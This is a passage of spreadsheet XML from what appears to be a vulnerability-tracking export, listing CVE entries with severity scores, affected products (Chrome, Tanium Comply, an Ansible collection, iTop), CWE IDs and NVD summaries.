      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87457</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87457</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87467</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87467</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87471</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87471</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87499</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87499</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87505</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87505</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87509</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87509</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87514</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87514</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87530</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87530</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87533</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87533</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87537</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87537</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87554</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>Race condition in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87554</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87874</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the memcached cache plugin of the community.general Ansible
collection. Although its documentation states that records are stored in JSON
format, the plugin performs no explicit serialization and relies on
python-memcached, which pickles values on write and unpickles them on read.
Because memcached is unauthenticated and cache keys are predictable, an attacker
able to reach a network-exposed or shared memcached instance can write a crafted
pickle payload that is deserialized and executed on the Ansible controller when
the poisoned fact cache is next read, leading to remote code execution.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87874</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30826</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the testing OQL query functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30826</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30890</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the synchro import script. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30890</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31803</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
